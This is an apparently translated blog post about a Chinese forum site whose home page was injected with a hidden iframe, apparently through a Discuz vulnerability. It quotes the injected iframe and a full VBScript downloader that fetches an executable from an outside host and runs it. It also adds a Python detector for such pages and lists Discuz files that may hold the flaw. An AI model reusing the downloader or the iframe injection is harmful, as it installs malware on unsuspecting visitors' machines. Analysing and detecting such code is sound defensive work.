落伍 has had a web trojan planted on it

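ps: I saw this news at both neeao's and CN.Tink's sites, so I am combining the two here. It was probably taken via the new DZ hole that came out a couple of days ago. The vulnerability was announced by a forum called freediscuz, but no details were published, only a patch.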

I took a look at the home page, and it contains this line:

<iframe src=http://www.lynndent.com/cf/style.htm width=0 height=0></iframe>

Then I opened that address..

The code contains:

<script language="VBScript">
on error resume next
my = "http://www.lynndent.com/cf/kkk.exe"
Set CAOc = document.createElement("object")
CAOc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

CAOi="Microsoft.XMLHTTP"
Set CAOd = CAOc.CreateObject(CAOi,"")
sf="Adodb."
sg=""
sh="S"
si="tream"
nihao= "lalalalala8888888"
chuanshuozhongdejingling= "哈哈"
haha="nihao"
CAOf=sf&sg&sh&si
CAOg=CAOf
set CAOa = CAOc.createobject(CAOg,"")
CAOa.type = 1
CAOh="GET"
CAOd.Open CAOh, my, False
CAOd.Send
CAO9="internat.exe"
set CAOb = CAOc.createobject("Scripting.FileSystemObject","")
set CAOe = CAOb.GetSpecialFolder(2)
CAOa.open
CAO9= CAOb.BuildPath(CAOe,CAO9)
CAOa.write CAOd.responseBody
CAOa.savetofile CAO9,2
CAOa.close
set CAOe = CAOc.createobject("Shell.Application","")
CAOe.ShellExecute CAO9,BBS,BBS,"open",0
</script>
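A way to check saved page source for the two things shown above, the zero-size iframe and the script's object names, as an added Python example that is not part of the original post. The function names and the sample page (with a placeholder host) are constructed for illustration; the classid and ProgIDs are the ones in the quoted script. Because the script assembles "Adodb.Stream" from fragments, the check folds simple string assignments before matching.

```python
import re

# classid and ProgIDs copied from the script quoted in the post
CLASSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"
PROGIDS = ("microsoft.xmlhttp", "adodb.stream",
           "scripting.filesystemobject", "shell.application")
ZERO_DIM = re.compile(r'\b(?:width|height)\s*=\s*["\']?0(?:px)?["\']?(?=[\s>])', re.I)
SRC = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)

def hidden_iframes(html):
    """Return the src of every iframe tag given a zero width or height."""
    found = []
    for tag in re.findall(r'<iframe\b[^>]*>', html, re.I):
        src = SRC.search(tag)
        if ZERO_DIM.search(tag):
            found.append(src.group(1) if src else "")
    return found

def resolve_strings(text):
    """Fold VBScript assignments `x = "lit"` and `x = a & b` into final values."""
    env = {}
    for line in text.splitlines():
        m = re.match(r'\s*(?:set\s+)?(\w+)\s*=\s*(.+?)\s*$', line, re.I)
        parts = [p.strip() for p in m.group(2).split("&")] if m else []
        vals = [p[1:-1] if re.fullmatch(r'"[^"]*"', p) else env.get(p.lower())
                for p in parts]
        if vals and None not in vals:
            env[m.group(1).lower()] = "".join(vals)
    return env

def scan(html):
    low = html.lower()
    findings = ["hidden iframe: " + src for src in hidden_iframes(html)]
    if CLASSID in low:
        findings.append("classid: " + CLASSID)
    folded = {v.lower() for v in resolve_strings(html).values()}
    findings += ["progid: " + p for p in PROGIDS
                 if p in folded or '"%s"' % p in low]
    return findings

# Constructed sample with a placeholder host; not the live page from the post
SAMPLE = '''<iframe src=http://example.invalid/style.htm width=0 height=0></iframe>
<script language="VBScript">
o.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
sf="Adodb."
sh="S"
si="tream"
f=sf&sh&si
</script>'''
```

A plain substring search for "adodb.stream" finds nothing in the sample; the match comes only after the fragments are folded together.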

Files where the vulnerability may be located:
\upload\include\chinese.class.php
\upload\include\common.inc.php
\upload\include\db_mysql.class.php
\upload\include\db_mysql_error.inc.php
\upload\include\global.func.php
\upload\include\newreply.inc.php
\upload\include\post.func.php
\upload\search.php
\seccode.php
\viewthread.php
\discuz_version.php
